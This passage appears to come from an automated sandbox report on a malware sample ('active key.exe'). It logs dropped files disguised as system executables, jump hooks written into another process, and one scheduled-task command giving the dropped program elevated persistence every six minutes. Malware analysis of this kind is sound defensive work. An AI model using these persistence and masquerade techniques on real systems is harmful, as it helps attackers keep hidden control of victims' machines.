                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Windows\tracing\fontdrvhost.exeJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\aAtQiRdB.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\hCHhiobl.logJump to dropped file
                    Source: C:\Users\user\Desktop\active key.exeFile created: C:\Windows\System32\ntoskrnl2.exeJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exeJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\UZXJUHSP.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Windows\tracing\fontdrvhost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\active key.exeFile created: C:\Windows\System32\ntoskrnl2.exeJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\aAtQiRdB.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\mlzPodne.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\UZXJUHSP.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\DnHERPdP.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\ZHsakaRB.logJump to dropped file
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\hCHhiobl.logJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                    Source: C:\Users\user\Desktop\active key.exeMemory written: PID: 6424 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
                    Source: C:\Users\user\Desktop\active key.exeMemory written: PID: 6424 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
                    Source: C:\Users\user\Desktop\active key.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
